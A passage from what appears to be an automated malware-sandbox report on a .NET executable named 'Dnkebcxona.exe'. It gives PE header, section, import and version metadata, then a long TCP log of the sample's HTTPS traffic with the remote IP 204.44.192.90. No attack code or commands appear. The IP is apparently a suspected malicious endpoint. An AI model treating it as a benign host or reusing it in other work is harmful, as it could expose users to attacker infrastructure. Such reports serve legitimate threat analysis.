                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x1fc3740x1fc40011b0df455ff28bd903b08be991ecc289unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x2000000x5b80x600fdc02757a2b61bd726a4b8abf78ab50eFalse0.4173177083333333data4.082358339746532IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x2020000xc0x2007f3cde3100bb7246f83f54ea560d4bbdFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_VERSION0x2000a00x32cdata0.4211822660098522
                                      RT_MANIFEST0x2003cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Version Infos

                                      DescriptionData
                                      Translation0x0000 0x04b0
                                      Comments
                                      CompanyName
                                      FileDescriptionDnkebcxona
                                      FileVersion1.0.0.0
                                      InternalNameDnkebcxona.exe
                                      LegalCopyrightCopyright 2011
                                      LegalTrademarks
                                      OriginalFilenameDnkebcxona.exe
                                      ProductNameDnkebcxona
                                      ProductVersion1.0.0.0
                                      Assembly Version1.0.0.0

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Feb 19, 2025 08:56:55.990909100 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:55.990971088 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:55.991039991 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.004688025 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.004720926 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.613791943 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.613872051 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.619146109 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.619168043 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.619501114 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.661987066 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.676945925 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.719331026 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.880392075 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.880422115 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.880430937 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.880692959 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.880721092 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.927522898 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.944401026 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.944416046 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.944470882 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.944513083 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.970468998 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.970480919 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.970547915 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.971785069 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.971792936 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.971836090 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:56.972832918 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.972841024 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:56.972883940 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.114123106 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.114192009 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.164443970 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.164518118 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.165010929 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.165071011 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.165858030 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.165910959 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.166738033 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.166790009 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.167624950 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.167691946 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.168514967 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.168570995 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.228562117 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.228672028 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.281138897 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.281234026 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.310563087 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.310718060 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.310992002 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.311358929 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.311532021 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.311594963 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.312217951 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.312294006 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.312611103 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.312679052 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.313144922 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.313301086 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.313618898 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.313689947 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.323076963 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.323215961 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.372139931 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.372229099 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.401643991 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.401778936 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.401845932 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.401907921 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.402251959 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.402312994 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.402417898 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.402477980 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.402741909 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.402790070 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.403263092 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.403449059 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.403790951 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.403805971 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.403866053 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.404093981 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.404149055 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.462770939 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.462876081 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.462960958 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.463015079 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.492233038 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.492322922 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.492628098 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.492691040 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.492783070 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.492840052 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.493241072 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.493298054 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.493839979 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.493899107 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.494278908 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.494334936 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.494683027 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.494746923 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.495137930 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.495193958 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.495203018 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.495223999 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.495246887 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.495271921 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.502909899 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.503002882 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.506418943 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.506521940 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.566540956 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.566638947 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.583609104 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.583796978 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.583847046 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.583901882 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.584167957 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.584218979 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.584779978 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.584845066 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.585097075 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.585143089 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.585666895 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.585710049 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.585721970 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.585736990 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.585774899 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.585774899 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.586188078 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.586244106 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.587088108 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.587133884 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.587142944 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.587152004 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.587171078 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.587176085 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.587198019 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.587219000 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.587229967 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.587256908 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.588057041 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.588129997 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.595463037 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.595565081 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.644423962 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.644583941 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.644633055 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.644692898 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.673871994 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.673964977 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.674236059 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.674299002 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.674695015 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.674762964 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.674969912 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.675035000 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.675406933 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.675476074 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.675854921 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.675904989 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.675915956 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.675930977 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.675947905 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.675968885 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.676604033 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.676675081 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.677057981 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.677104950 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.677125931 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.677131891 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.677155018 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.677175999 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.678006887 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.678051949 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.678071976 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.678078890 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.678097010 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.678114891 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.680574894 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.680668116 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.735059023 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.735141039 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.735471010 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.735532999 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.764599085 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.764662981 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.765266895 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.765321016 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.765597105 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.765645027 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.765894890 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.765950918 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.766458988 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.766604900 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.766911983 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.766959906 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.766992092 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.767035961 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.767867088 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.767911911 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.767923117 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.767932892 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.767961979 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.767978907 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.768570900 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.768619061 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.768623114 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.768629074 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.768665075 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.769498110 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.769539118 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.769568920 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.769576073 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.769623995 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.777070045 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.777137041 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.825911999 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.826023102 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.826067924 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.826123953 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.855385065 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.855520010 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.855540037 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.855559111 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.855570078 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.855592966 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.856065035 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.856122017 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.859344959 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.859443903 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.859617949 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.859675884 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.859831095 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.859889030 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.859997034 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860054016 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.860202074 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860263109 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.860431910 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860506058 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.860569954 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860647917 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.860685110 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860749960 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.860793114 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860852957 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.861351013 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.861414909 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.861463070 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.861526012 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.868891001 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.869025946 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.917512894 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.917637110 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.917824984 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.917893887 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.947195053 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.947324038 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.947643995 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.947727919 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.947837114 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.947900057 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.948160887 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.948225975 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.948822975 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.948892117 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.949145079 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.949197054 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.949208021 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.949223995 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.949248075 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.949274063 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.950037003 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950107098 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.950221062 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950283051 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.950331926 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950392008 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.950896025 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950939894 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950954914 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.950963974 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950988054 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.951010942 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.951477051 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.951534033 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.959568024 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.959664106 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.008292913 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.008378983 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.008619070 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.008677959 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.037982941 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.038065910 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.038252115 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.038316965 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.038615942 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.038671970 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.038800955 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.038850069 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.039459944 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.039516926 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.039714098 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.039773941 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.040045023 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.040076971 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.040103912 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.040115118 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.040128946 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.040154934 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.040843964 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.040936947 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.041429996 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.041510105 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.041786909 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.041836977 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.041857004 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.041862965 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.041874886 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.041894913 CET49704443192.168.2.5204.44.192.90
